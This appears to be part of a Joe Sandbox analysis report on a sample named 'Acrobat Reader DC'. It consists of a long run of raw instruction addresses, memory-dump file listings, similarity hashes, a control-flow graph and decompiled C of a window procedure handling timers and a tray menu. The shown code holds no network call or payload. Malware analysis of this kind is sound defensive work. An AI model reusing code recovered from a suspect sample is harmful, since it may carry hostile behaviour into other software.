                                  0x0040a904
                                  0x0040a90b
                                  0x0040a911
                                  0x0040a917
                                  0x0040a91a
                                  0x0040a91f
                                  0x0040a922
                                  0x0042b7fc
                                  0x0042b7fd
                                  0x0042b800
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b812
                                  0x0042b81a
                                  0x00000000
                                  0x00000000
                                  0x0042b822
                                  0x0042b828
                                  0x00000000
                                  0x00000000
                                  0x0042b82f
                                  0x0042b831
                                  0x0042b836
                                  0x0042b839
                                  0x0042b83b
                                  0x0042b867
                                  0x0042b869
                                  0x0042b841
                                  0x0042b841
                                  0x0042b847
                                  0x0042b849
                                  0x0042b84b
                                  0x0042b84e
                                  0x0042b851
                                  0x0042b854
                                  0x0042b857
                                  0x0042b85a
                                  0x0042b85d
                                  0x0042b85f
                                  0x0042b85f
                                  0x00000000
                                  0x00000000
                                  0x0042b88a
                                  0x0042b88f
                                  0x0042b894
                                  0x0042b897
                                  0x0042b899
                                  0x0042b8be
                                  0x0042b8be
                                  0x0042b89f
                                  0x0042b89f
                                  0x0042b8a5
                                  0x0042b8a9
                                  0x0042b8ae
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b2
                                  0x0042b8b6
                                  0x0042b8b6
                                  0x0042b8c0
                                  0x0042b8c2
                                  0x0042b8c6
                                  0x0042b8cc
                                  0x0042b8cf
                                  0x0042b8cf
                                  0x00000000
                                  0x00000000
                                  0x0042b871
                                  0x0042b876
                                  0x00000000
                                  0x00000000
                                  0x0042b87d
                                  0x0042b883
                                  0x00000000
                                  0x00000000
                                  0x0042b8d6
                                  0x0042b8dd
                                  0x0042b8e3
                                  0x0042b8e5
                                  0x0042b8ea
                                  0x0042b8ed
                                  0x0042b8ee
                                  0x0042b8f0
                                  0x0042b8f6
                                  0x0042b8fc
                                  0x0042b8fe
                                  0x0042b8ff
                                  0x0042b900
                                  0x0042b906
                                  0x0042b908
                                  0x0042b90e
                                  0x0042b910
                                  0x0042b911
                                  0x0042b917
                                  0x0042b919
                                  0x0042b91a
                                  0x0042b91f
                                  0x0042b922
                                  0x0042b922
                                  0x0042b908
                                  0x00000000
                                  0x00000000
                                  0x0042b92d
                                  0x0042b932
                                  0x00000000
                                  0x00000000
                                  0x0042b939
                                  0x0042b93b
                                  0x0042b940
                                  0x0042b943
                                  0x0042b945
                                  0x00000000
                                  0x00000000
                                  0x0042b94b
                                  0x0042b953
                                  0x0042b958
                                  0x00000000
                                  0x00000000
                                  0x0042b968
                                  0x0042b96a
                                  0x0042b96f
                                  0x0042b971
                                  0x0042b977
                                  0x0042b979
                                  0x0042b97b
                                  0x0042b97d
                                  0x0042b97f
                                  0x0042b982
                                  0x0042b984
                                  0x0042b9b8
                                  0x0042b9ba
                                  0x0042b9bf
                                  0x0042b9c1
                                  0x0042b9c4
                                  0x0042b9c6
                                  0x0042b9c9
                                  0x0042b9cc
                                  0x0042b98a
                                  0x0042b98a
                                  0x0042b98b
                                  0x0042b990
                                  0x0042b992
                                  0x0042b995
                                  0x0042b997
                                  0x0042b999
                                  0x0042b99f
                                  0x0042b9a2
                                  0x0042b9a6
                                  0x0042b9ab
                                  0x0042b9b0
                                  0x00000000
                                  0x00000000
                                  0x0042b9d4
                                  0x0042b9d6
                                  0x0042b9db
                                  0x0042b9de
                                  0x0042b9e0
                                  0x0042b95f
                                  0x0042b95f
                                  0x0042b961
                                  0x00000000
                                  0x0042b961
                                  0x0042b9e6
                                  0x0042b9ee
                                  0x0042b9f3
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x0040a928
                                  0x0040a928
                                  0x0040a92e
                                  0x00000000
                                  0x0040a92e
                                  0x0040a8da
                                  0x0040a829
                                  0x0040a9f5
                                  0x0040a9f8
                                  0x0040ab3a
                                  0x0040ab3d
                                  0x00000000
                                  0x00000000
                                  0x0040ab43
                                  0x0040ab4a
                                  0x00000000
                                  0x0040adf2
                                  0x0040adf4
                                  0x0040adf7
                                  0x0040ae02
                                  0x0040ae02
                                  0x0040ae05
                                  0x0042b285
                                  0x0042b288
                                  0x0042b28b
                                  0x00000000
                                  0x00000000
                                  0x0042b291
                                  0x0042b298
                                  0x00000000
                                  0x0042b29f
                                  0x0042b2a0
                                  0x0042b2a5
                                  0x00000000
                                  0x00000000
                                  0x0042b2ac
                                  0x0042b2ad
                                  0x0042b2b2
                                  0x00000000
                                  0x00000000
                                  0x0042b2de
                                  0x0042b2e3
                                  0x0042b2e7
                                  0x0042b2ef
                                  0x0042b2f4
                                  0x0042b2f9
                                  0x0042b2fd
                                  0x00000000
                                  0x00000000
                                  0x0042b2b9
                                  0x0042b2be
                                  0x0042b2c2
                                  0x0042b2ca
                                  0x0042b2cf
                                  0x0042b2d4
                                  0x0042b2d8
                                  0x0042b2fe
                                  0x0042b2fe
                                  0x0042b307
                                  0x0042b308
                                  0x0042b30d
                                  0x0042b310
                                  0x0042b312
                                  0x00000000
                                  0x00000000
                                  0x0042b31b
                                  0x0042b31e
                                  0x0042b323
                                  0x0042b325
                                  0x0042b332
                                  0x0042b339
                                  0x0042b33a
                                  0x0042b33f
                                  0x0042b344
                                  0x0042b348
                                  0x0042b34d
                                  0x0042b354
                                  0x0042b35f
                                  0x0042b362
                                  0x0042b364
                                  0x0042b36b
                                  0x0042b370
                                  0x0042b374
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b298
                                  0x0040ae0b
                                  0x0040ae0c
                                  0x0040ae0f
                                  0x00000000
                                  0x0040ae0f
                                  0x0040adf9
                                  0x0040adfc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ad9c
                                  0x0040ada1
                                  0x0040ada5
                                  0x0040adad
                                  0x0040adb2
                                  0x0040adb7
                                  0x0042b12b
                                  0x0042b130
                                  0x0042b142
                                  0x0042b136
                                  0x0042b136
                                  0x0042b13a
                                  0x0042b13a
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adc1
                                  0x0040adc4
                                  0x0040adc9
                                  0x0040adcc
                                  0x0040add1
                                  0x0040add3
                                  0x00000000
                                  0x0040add9
                                  0x0040add9
                                  0x0040ade0
                                  0x00000000
                                  0x00000000
                                  0x0040ade6
                                  0x0040adea
                                  0x00000000
                                  0x0040adea
                                  0x00000000
                                  0x0042b079
                                  0x0042b07e
                                  0x0042b082
                                  0x0042b08a
                                  0x0042b08f
                                  0x0042b092
                                  0x0042b095
                                  0x0042b097
                                  0x0042b09a
                                  0x0042b09d
                                  0x0042b0a0
                                  0x0042b0a2
                                  0x0042b0a4
                                  0x0042b0ad
                                  0x0042b0af
                                  0x0042b0b4
                                  0x0042b0b8
                                  0x0042b0bf
                                  0x0042b0c1
                                  0x0042b0c4
                                  0x0042b0c6
                                  0x00000000
                                  0x00000000
                                  0x0042b0cf
                                  0x0042b0d4
                                  0x0042b0d8
                                  0x0042b0e0
                                  0x0042b0e5
                                  0x0042b0e8
                                  0x0042b0eb
                                  0x0042b0ed
                                  0x0042b0f0
                                  0x0042b0f3
                                  0x0042b0f5
                                  0x0042b0f7
                                  0x0042b100
                                  0x0042b102
                                  0x0042b107
                                  0x0042b10b
                                  0x0042b10d
                                  0x0042b114
                                  0x0042b116
                                  0x00000000
                                  0x00000000
                                  0x0042b1d2
                                  0x0042b1d7
                                  0x0042b1db
                                  0x0042b1e0
                                  0x0042b1e3
                                  0x0042b1e5
                                  0x0042b1e8
                                  0x0042b1eb
                                  0x0042b1ed
                                  0x0042b1f0
                                  0x0042b1f3
                                  0x0042b1f5
                                  0x0042b1f7
                                  0x0042b1fa
                                  0x0042b1fd
                                  0x0042b200
                                  0x0042b204
                                  0x0042b207
                                  0x0042b20b
                                  0x0042b20e
                                  0x0042b212
                                  0x0042b214
                                  0x0042b218
                                  0x0042b21d
                                  0x0042b221
                                  0x0042b222
                                  0x0042b223
                                  0x0042b228
                                  0x0042b22a
                                  0x0042bb51
                                  0x0042bb53
                                  0x0042bb56
                                  0x0042bb65
                                  0x0042bb6a
                                  0x0042bb6a
                                  0x0042bb6e
                                  0x00000000
                                  0x0042bb6e
                                  0x0042b230
                                  0x0042b234
                                  0x0042b237
                                  0x00000000
                                  0x00000000
                                  0x0040ad09
                                  0x0040ad0e
                                  0x0040ad12
                                  0x0040ad1a
                                  0x0040ad1f
                                  0x0040ad24
                                  0x0040ae23
                                  0x0040ae28
                                  0x0042b11f
                                  0x0042b123
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2e
                                  0x0040ad32
                                  0x0040ad38
                                  0x0040ad3b
                                  0x0040ad40
                                  0x0040ad42
                                  0x0042bb47
                                  0x0042bb4b
                                  0x00000000
                                  0x0040ad48
                                  0x0040ad48
                                  0x0040ad4c
                                  0x00000000
                                  0x0040ad4c
                                  0x00000000
                                  0x0042b14b
                                  0x0042b150
                                  0x0042b154
                                  0x0042b159
                                  0x0042b160
                                  0x0042b165
                                  0x0042b16a
                                  0x0042b16e
                                  0x0042b172
                                  0x0042b177
                                  0x0042b179
                                  0x00000000
                                  0x00000000
                                  0x0042b17f
                                  0x0042b186
                                  0x00000000
                                  0x00000000
                                  0x0042b18c
                                  0x0042b190
                                  0x0042b193
                                  0x00000000
                                  0x00000000
                                  0x0042b37c
                                  0x0042b37e
                                  0x0042b3c6
                                  0x0042b3c6
                                  0x0042b3ca
                                  0x0042b3d1
                                  0x0042b3d6
                                  0x0042b3d8
                                  0x0042bb99
                                  0x0042bb9c
                                  0x0042bba1
                                  0x0042bbaf
                                  0x0042bbb4
                                  0x0042bbb8
                                  0x00000000
                                  0x0042bbb8
                                  0x0042b3de
                                  0x0042b3e0
                                  0x0042b3e3
                                  0x0042b3e7
                                  0x0042b3eb
                                  0x0042b3ed
                                  0x0042b3ef
                                  0x0042b3f7
                                  0x0042b3fc
                                  0x0042b3ff
                                  0x0042b403
                                  0x0042b404
                                  0x0042b405
                                  0x0042b406
                                  0x0042b408
                                  0x0042b40d
                                  0x0042b40f
                                  0x0042bbbe
                                  0x0042bbc1
                                  0x0042bbc6
                                  0x0042bbd1
                                  0x0042bbd6
                                  0x00000000
                                  0x0042bbd6
                                  0x0042b415
                                  0x0042b419
                                  0x0042b41d
                                  0x0042b425
                                  0x0042b42a
                                  0x0042b42c
                                  0x0042b431
                                  0x0042b435
                                  0x00000000
                                  0x0042b435
                                  0x0042b387
                                  0x0042b38b
                                  0x0042b38f
                                  0x0042b39f
                                  0x0042b39f
                                  0x0042b3b2
                                  0x0042b3b7
                                  0x0042b3b9
                                  0x0042bb74
                                  0x0042bb77
                                  0x0042bb7c
                                  0x0042bb8a
                                  0x0042bb8f
                                  0x0042bb93
                                  0x00000000
                                  0x0042bb93
                                  0x0042b3bf
                                  0x00000000
                                  0x0042b3bf
                                  0x0042b395
                                  0x0042b399
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae16
                                  0x0040ae17
                                  0x0040ae1c
                                  0x00000000
                                  0x00000000
                                  0x0040aec0
                                  0x0040aec1
                                  0x0040aec6
                                  0x00000000
                                  0x00000000
                                  0x0040aeb6
                                  0x0040aeb8
                                  0x0040aeb9
                                  0x00000000
                                  0x00000000
                                  0x0042b244
                                  0x0042b245
                                  0x0042b24a
                                  0x00000000
                                  0x00000000
                                  0x0042b26b
                                  0x0042b26c
                                  0x0042b271
                                  0x00000000
                                  0x00000000
                                  0x0042b25e
                                  0x0042b25f
                                  0x0042b264
                                  0x00000000
                                  0x00000000
                                  0x0040accc
                                  0x0040accd
                                  0x0040acd2
                                  0x00000000
                                  0x00000000
                                  0x0040acd9
                                  0x0040acda
                                  0x0040acdf
                                  0x00000000
                                  0x00000000
                                  0x0040abfe
                                  0x0040ac02
                                  0x0040ac05
                                  0x0040ad8e
                                  0x0040ad91
                                  0x00000000
                                  0x00000000
                                  0x0042b1a0
                                  0x0040ac10
                                  0x0040ac10
                                  0x0040ac11
                                  0x00000000
                                  0x0040ac11
                                  0x0040ac0b
                                  0x0040ac0b
                                  0x00000000
                                  0x00000000
                                  0x0042b1aa
                                  0x0042b1ae
                                  0x0042b1b1
                                  0x0042b1c5
                                  0x0042b1c5
                                  0x0042b1ca
                                  0x0042b1ca
                                  0x0042b1cb
                                  0x00000000
                                  0x0042b1cb
                                  0x0042b1b7
                                  0x0042b1bc
                                  0x0042b1bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac3d
                                  0x0040ac3e
                                  0x0040ac43
                                  0x00000000
                                  0x00000000
                                  0x0040ab52
                                  0x0040ab57
                                  0x00000000
                                  0x00000000
                                  0x0040ace6
                                  0x0040ace7
                                  0x0040acec
                                  0x00000000
                                  0x00000000
                                  0x0042b251
                                  0x0042b252
                                  0x0042b257
                                  0x00000000
                                  0x00000000
                                  0x0042b278
                                  0x0042b279
                                  0x0042b27e
                                  0x0040a83d
                                  0x0040a83d
                                  0x0040a841
                                  0x0040a845
                                  0x0040a845
                                  0x0040a849
                                  0x0040a84f
                                  0x0040ab5e
                                  0x0040a855
                                  0x0040a855
                                  0x0040a855
                                  0x0040a85c
                                  0x0040a867
                                  0x0040aaec
                                  0x0040aaef
                                  0x0040ab1f
                                  0x0040ab1f
                                  0x0040ab22
                                  0x0040ae37
                                  0x0040ae37
                                  0x0040ae3c
                                  0x0040ab31
                                  0x0040ab31
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x00000000
                                  0x0040a800
                                  0x0040ae4f
                                  0x0040ae56
                                  0x0040ae5b
                                  0x0040ae5d
                                  0x0042bae5
                                  0x0042bae5
                                  0x0042baea
                                  0x0040ae7a
                                  0x0040ae7e
                                  0x0040ae83
                                  0x00000000
                                  0x0040ae83
                                  0x0042baf0
                                  0x0042baf5
                                  0x0042bafa
                                  0x0042baff
                                  0x0042bb01
                                  0x0042bc43
                                  0x0042bc48
                                  0x0042bc4c
                                  0x0042bc4c
                                  0x0042bc51
                                  0x0042bc55
                                  0x0042bc56
                                  0x0042bc56
                                  0x0042bc5f
                                  0x0042bc64
                                  0x0040a8a4
                                  0x0040a8aa
                                  0x0040a8aa
                                  0x0042bb07
                                  0x0042bb0b
                                  0x0042bb0f
                                  0x0042bb24
                                  0x0042bb2d
                                  0x0042bb15
                                  0x0042bb15
                                  0x0042bb1e
                                  0x0042bb1e
                                  0x0042bb33
                                  0x0042bb34
                                  0x0042bb3d
                                  0x00000000
                                  0x0042bb3d
                                  0x0040ae63
                                  0x0040ae68
                                  0x0040ae6c
                                  0x00000000
                                  0x00000000
                                  0x0040ae72
                                  0x0040ae74
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae74
                                  0x0040ab28
                                  0x0040ab2b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ab2b
                                  0x0040aaf1
                                  0x00000000
                                  0x0040aaf8
                                  0x0040aafa
                                  0x0040abd6
                                  0x0040abd8
                                  0x0040ab00
                                  0x0040ab00
                                  0x0040ab02
                                  0x0040ab07
                                  0x0040ab0a
                                  0x0040ab0c
                                  0x0042bade
                                  0x0040ab12
                                  0x0040ab12
                                  0x0040ab12
                                  0x0040ab14
                                  0x0040ab17
                                  0x0040ab17
                                  0x0040ab1b
                                  0x0040ab1b
                                  0x0040ab1b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac90
                                  0x0040ac90
                                  0x0040ac94
                                  0x0040ac96
                                  0x0040ad01
                                  0x0040ac98
                                  0x0040ac98
                                  0x0040ac98
                                  0x0040ac9b
                                  0x0040ac9e
                                  0x00000000
                                  0x00000000
                                  0x0040aca0
                                  0x0040aca2
                                  0x0040ad05
                                  0x0040aca4
                                  0x0040aca4
                                  0x0040aca4
                                  0x0040aca7
                                  0x0040acaa
                                  0x00000000
                                  0x0040acb0
                                  0x0040acb0
                                  0x0040acb5
                                  0x0040acb9
                                  0x0040acbe
                                  0x0040acc0
                                  0x00000000
                                  0x0040acc6
                                  0x0040acc6
                                  0x00000000
                                  0x0040acc6
                                  0x0040acc0
                                  0x0040acaa
                                  0x0040acf3
                                  0x0040acf7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042bc0b
                                  0x0042bc0f
                                  0x0042bc17
                                  0x00000000
                                  0x00000000
                                  0x0042bc21
                                  0x0042bc25
                                  0x0042bc2d
                                  0x00000000
                                  0x00000000
                                  0x0042bbf5
                                  0x0042bbf5
                                  0x0042bbf9
                                  0x0042bc01
                                  0x00000000
                                  0x00000000
                                  0x0040aaf1
                                  0x0040a872
                                  0x00000000
                                  0x00000000
                                  0x0040a878
                                  0x0040a87e
                                  0x0040ac18
                                  0x0040ac20
                                  0x0040ac20
                                  0x0040ac23
                                  0x0040ac28
                                  0x0040ac29
                                  0x0040ac2e
                                  0x0040ac31
                                  0x0040ac33
                                  0x0040ac33
                                  0x0040ac20
                                  0x0040a884
                                  0x0040a88a
                                  0x0040a8a2
                                  0x0040a8a2
                                  0x00000000
                                  0x0040a890
                                  0x0040a890
                                  0x0040a890
                                  0x0040a893
                                  0x0040a894
                                  0x0040a899
                                  0x0040a89c
                                  0x0040a89e
                                  0x00000000
                                  0x0040a890
                                  0x0040abbb
                                  0x0040abbb
                                  0x0040abc0
                                  0x0040abc4
                                  0x0040abc9
                                  0x0040abc9
                                  0x0042bbdf
                                  0x0042bbeb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ab4a
                                  0x0040a9fe
                                  0x0040aa02
                                  0x0040aa0a
                                  0x0040aa0c
                                  0x0040ab66
                                  0x0040ab6b
                                  0x0040abeb
                                  0x0040abf0
                                  0x0040abf4
                                  0x0040ab6d
                                  0x0040ab6d
                                  0x0040ab6f
                                  0x0040ab74
                                  0x0040ab77
                                  0x0040ab79
                                  0x0042b6c3
                                  0x0040ab7f
                                  0x0040ab7f
                                  0x0040ab83
                                  0x0040ab8c
                                  0x0040ab91
                                  0x0040ab93
                                  0x0040ab93
                                  0x0040ab9b
                                  0x0040ab9e
                                  0x0040ab9e
                                  0x0040aa80
                                  0x0040aa88
                                  0x0040aa8b
                                  0x0040aa8c
                                  0x0040aa90
                                  0x0040aa93
                                  0x0040aba7
                                  0x0040abac
                                  0x0042b6ce
                                  0x0040abb2
                                  0x0040abb2
                                  0x0040abb2
                                  0x0040aa99
                                  0x0040aa99
                                  0x0040aa99
                                  0x0040aa9b
                                  0x0040aa9d
                                  0x0040aaa0
                                  0x0040aaa4
                                  0x0040aaa6
                                  0x0042b6d7
                                  0x0042b6dc
                                  0x0042b6e0
                                  0x0042b6e0
                                  0x0040aaac
                                  0x0040aaaf
                                  0x0040aab2
                                  0x0042b6ec
                                  0x0042b6ee
                                  0x0042b6f0
                                  0x00000000
                                  0x00000000
                                  0x0042b6f7
                                  0x0042b6ff
                                  0x0042b700
                                  0x0042b705
                                  0x0042b709
                                  0x00000000
                                  0x0040aab8
                                  0x0040aab8
                                  0x0040aab8
                                  0x0040aabb
                                  0x0042b711
                                  0x0042b713
                                  0x0042b715
                                  0x0042b71c
                                  0x0042b721
                                  0x0042b721
                                  0x0040aac1
                                  0x0040aac1
                                  0x0040aac4
                                  0x0042b72c
                                  0x0042b731
                                  0x0040aaca
                                  0x0040aaca
                                  0x0040aacd
                                  0x0042b73f
                                  0x0042b740
                                  0x0042b74a
                                  0x0042b74b
                                  0x0042b750
                                  0x0042b754
                                  0x0040aad3
                                  0x0040aad3
                                  0x0040aad6
                                  0x0042b75c
                                  0x0042b75e
                                  0x0042b760
                                  0x0042b767
                                  0x0042b76c
                                  0x0042b76c
                                  0x0042b760
                                  0x0040aad6
                                  0x0040aacd
                                  0x0040aac4
                                  0x0040aadc
                                  0x0040aadc
                                  0x0040aae3
                                  0x0040aae5
                                  0x00000000
                                  0x0040aae5
                                  0x0040aab2
                                  0x0040aa12
                                  0x0040aa18
                                  0x00000000
                                  0x00000000
                                  0x0040aa1a
                                  0x0040aa1d
                                  0x0040aa1f
                                  0x0042b43e
                                  0x0042b443
                                  0x0042b443
                                  0x0040aa25
                                  0x0040aa28
                                  0x0040aa2b
                                  0x0042b44f
                                  0x0042b451
                                  0x0042b453
                                  0x00000000
                                  0x00000000
                                  0x0042b45a
                                  0x0042b462
                                  0x0042b463
                                  0x0042b468
                                  0x00000000
                                  0x0040aa31
                                  0x0040aa31
                                  0x0040aa31
                                  0x0040aa34
                                  0x0042b470
                                  0x0042b472
                                  0x0042b474
                                  0x0042b47b
                                  0x0042b47b
                                  0x0040aa3a
                                  0x0040aa3a
                                  0x0040aa3d
                                  0x0042b487
                                  0x0040aa43
                                  0x0040aa43
                                  0x0040aa46
                                  0x0042b496
                                  0x0042b497
                                  0x0042b4a1
                                  0x0042b4a2
                                  0x0042b4a7
                                  0x0040aa4c
                                  0x0040aa4c
                                  0x0040aa4f
                                  0x0042b4af
                                  0x0042b4b1
                                  0x0042b4b3
                                  0x0042b4ba
                                  0x0042b4ba
                                  0x0042b4b3
                                  0x0040aa4f
                                  0x0040aa46
                                  0x0040aa3d
                                  0x0040aa55
                                  0x0040aa55
                                  0x0040aa5c
                                  0x0040aa62
                                  0x0040aa67
                                  0x0040aa6a
                                  0x0040aa6f
                                  0x0040aa72
                                  0x0042b4c4
                                  0x0042b4c5
                                  0x0042b4c8
                                  0x00000000
                                  0x00000000
                                  0x0042b4ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b4db
                                  0x0042b4dd
                                  0x0042b4e3
                                  0x00000000
                                  0x00000000
                                  0x0042b4eb
                                  0x0042b4f1
                                  0x00000000
                                  0x00000000
                                  0x0042b4f8
                                  0x0042b4fa
                                  0x0042b4ff
                                  0x0042b502
                                  0x0042b504
                                  0x0042b530
                                  0x0042b532
                                  0x0042b50a
                                  0x0042b50a
                                  0x0042b510
                                  0x0042b512
                                  0x0042b514
                                  0x0042b517
                                  0x0042b51a
                                  0x0042b51d
                                  0x0042b520
                                  0x0042b523
                                  0x0042b526
                                  0x0042b528
                                  0x0042b528
                                  0x00000000
                                  0x00000000
                                  0x0042b553
                                  0x0042b558
                                  0x0042b55d
                                  0x0042b560
                                  0x0042b562
                                  0x0042b587
                                  0x0042b587
                                  0x0042b568
                                  0x0042b568
                                  0x0042b56e
                                  0x0042b572
                                  0x0042b577
                                  0x0042b579
                                  0x0042b579
                                  0x0042b579
                                  0x0042b57b
                                  0x0042b57f
                                  0x0042b57f
                                  0x0042b589
                                  0x0042b58b
                                  0x0042b58f
                                  0x0042b595
                                  0x0042b598
                                  0x0042b598
                                  0x00000000
                                  0x00000000
                                  0x0042b53a
                                  0x0042b53f
                                  0x00000000
                                  0x00000000
                                  0x0042b546
                                  0x0042b54c
                                  0x00000000
                                  0x00000000
                                  0x0042b59f
                                  0x0042b5a6
                                  0x0042b5ac
                                  0x0042b5ae
                                  0x0042b5b3
                                  0x0042b5b6
                                  0x0042b5b7
                                  0x0042b5b9
                                  0x0042b5bf
                                  0x0042b5c5
                                  0x0042b5c7
                                  0x0042b5c8
                                  0x0042b5c9
                                  0x0042b5cf
                                  0x0042b5d1
                                  0x0042b5d7
                                  0x0042b5d9
                                  0x0042b5da
                                  0x0042b5e0
                                  0x0042b5e2
                                  0x0042b5e3
                                  0x0042b5e8
                                  0x0042b5eb
                                  0x0042b5eb
                                  0x0042b5d1
                                  0x00000000
                                  0x00000000
                                  0x0042b5f6
                                  0x0042b5fb
                                  0x00000000
                                  0x00000000
                                  0x0042b602
                                  0x0042b604
                                  0x0042b609
                                  0x0042b60c
                                  0x0042b60e
                                  0x00000000
                                  0x00000000
                                  0x0042b614
                                  0x0042b61c
                                  0x0042b621
                                  0x00000000
                                  0x00000000
                                  0x0042b631
                                  0x0042b633
                                  0x0042b638
                                  0x0042b63a
                                  0x0042b640
                                  0x0042b642
                                  0x0042b644
                                  0x0042b646
                                  0x0042b648
                                  0x0042b64b
                                  0x0042b64d
                                  0x0042b681
                                  0x0042b683
                                  0x0042b688
                                  0x0042b68a
                                  0x0042b68d
                                  0x0042b68f
                                  0x0042b692
                                  0x0042b695
                                  0x0042b653
                                  0x0042b653
                                  0x0042b654
                                  0x0042b659
                                  0x0042b65b
                                  0x0042b65e
                                  0x0042b660
                                  0x0042b662
                                  0x0042b668
                                  0x0042b66b
                                  0x0042b66f
                                  0x0042b674
                                  0x0042b679
                                  0x00000000
                                  0x00000000
                                  0x0042b69d
                                  0x0042b69f
                                  0x0042b6a4
                                  0x0042b6a7
                                  0x0042b6a9
                                  0x0042b628
                                  0x0042b628
                                  0x0042b62a
                                  0x00000000
                                  0x0042b62a
                                  0x0042b6af
                                  0x0042b6b7
                                  0x0042b6bc
                                  0x00000000
                                  0x00000000
                                  0x0042b4ce
                                  0x0040aa78
                                  0x0040aa78
                                  0x0040aa7e
                                  0x00000000
                                  0x0040aa7e
                                  0x0040aa2b
                                  0x0040a838
                                  0x0040a838
                                  0x00000000
                                  0x0040a838

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1264 401100-401111 1265 401113-401119 1264->1265 1266 401179-401180 1264->1266 1268 401144-40114a 1265->1268 1269 40111b-40111e 1265->1269 1266->1265 1267 401182 1266->1267 1270 40112c-401141 DefWindowProcW 1267->1270 1272 401184-40118e call 401250 1268->1272 1273 40114c-40114f 1268->1273 1269->1268 1271 401120-401126 1269->1271 1271->1270 1277 42b038-42b03f 1271->1277 1281 401193-40119a 1272->1281 1274 401151-401157 1273->1274 1275 40119d 1273->1275 1278 401219-40121f 1274->1278 1279 40115d 1274->1279 1282 4011a3-4011a9 1275->1282 1283 42afb4-42afc5 call 40f190 1275->1283 1277->1270 1280 42b045-42b059 call 401000 call 40e0c0 1277->1280 1278->1271 1286 401225-42b06d call 468b0e 1278->1286 1284 401163-401166 1279->1284 1285 42b01d-42b024 1279->1285 1280->1270 1282->1271 1289 4011af 1282->1289 1283->1281 1291 42afe9-42b018 call 40f190 call 401a50 1284->1291 1292 40116c-401172 1284->1292 1285->1270 1290 42b02a-42b033 call 4370f4 1285->1290 1286->1281 1289->1271 1296 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1289->1296 1297 4011db-401202 SetTimer RegisterWindowMessageW 1289->1297 1290->1270 1291->1270 1292->1271 1300 401174-42afde call 45fd57 1292->1300 1297->1281 1298 401204-401216 CreatePopupMenu 1297->1298 1300->1270 1315 42afe4 1300->1315 1315->1281
                                  C-Code - Quality: 96%
                                  			E00401100(int __edi, struct HWND__* _a4, int _a8, signed int _a12) {
				struct HWND__* __ebx;
				void* __esi;
				signed int _t20;
				long _t22;
				void* _t36;
				struct HWND__* _t38;
				void* _t43;
				void* _t49;
				int _t52;
				void* _t67;

				_t52 = __edi;
				_t38 = _a4;
				if(_t38 !=  *0x497518) {
					__eflags =  *0x497518;
					if( *0x497518 == 0) {
						goto L1;
					} else {
						goto L4;
					}
				} else {
					L1:
					if(_t52 >= 0x111 || _t52 < 0x12) {
						__eflags = _t52 - 0x113;
						if(_t52 == 0x113) {
							E00401250(_a8, _t43, _t38, 0x4a8710);
							goto L15;
						} else {
							__eflags = _t52 - 0x10;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									 *0x4974e6 = 1;
									E0040F190(_t43, 0x4a8178);
									goto L15;
								} else {
									_t20 = _t52 - 1;
									__eflags = _t20 - 6;
									if(_t20 > 6) {
										goto L3;
									} else {
										switch( *((intOrPtr*)(_t20 * 4 +  &M0040122C))) {
											case 0:
												__eax = SetTimer(__ebx, 1, 0x2ee, 0); // executed
												__eax = RegisterWindowMessageW(L"TaskbarCreated");
												__eflags =  *0x4a8710;
												 *0x4a95e8 = __eax;
												if( *0x4a8710 != 0) {
